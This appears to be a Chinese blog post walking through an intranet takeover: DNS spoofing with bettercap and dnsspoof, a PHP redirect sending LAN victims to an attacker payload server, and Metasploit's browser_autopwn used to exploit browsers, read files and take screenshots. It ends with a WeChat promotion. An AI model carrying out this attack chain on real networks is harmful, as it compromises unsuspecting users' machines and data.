我是如何統治內網的
日出東方,唯我不敗;千秋萬代,一統江湖!
教主文成武德、澤被蒼生 ,千秋萬載,一統江湖!
測試主機:kali 2016.2
工具:bettercap、metasploit、dnsspoof、armitage
前期準備工作
在kali下並沒有集成bettercap,所以我們需要自己安裝

安裝完成

啟動postgresql服務



啟動armitage(關於armitage)

準備一個hosts文件(用於DNS欺騙)

更改:剛才試了一下,在hosts文件中加上埠號好像會出現一些意料不到的問題。這裡我們換個思路,直接到ip地址不加埠號,然後開啟apache服務,然後將下面的代碼保存為index.php放在根目錄下(/var/www/html/)
<?php header("Location:http://10.167.33.1:8080"); ?>n
這樣在DNS欺騙後會跳到指定ip,然後在通過php重定向到我們的payload。
還有一種方法是在下邊啟動瀏覽器自動攻擊插件時,將埠號直接改成80埠。
/**************************************zhun bei wan cheng *****************************************/
啟動瀏覽器自動攻擊模塊:browser_autopwn


DNS欺騙(忘了截圖 圖是後補的 所以參數有點不一樣)

現在我們就等魚上鉤,現在同一網關下的主機不管打開什麼URL都會解析到我們的URL中,當他打開我們的URL時,程序會自動驗證哪個pay可用


查看文件

屏幕截圖

當然功能遠遠不止這些,更多好玩的可以自己探索。
水平有限,有錯誤請指出。
如果有一塊學習的同志私聊我上車。
上車的有點多,要超載了,關注公眾號吧,公眾號更新會比知乎的更全面
公眾號:sssie95zz
二維碼鏈接如下:
http://weixin.qq.com/r/EjoZAYjEkdXurcxi928A (二維碼自動識別)
推薦閱讀:
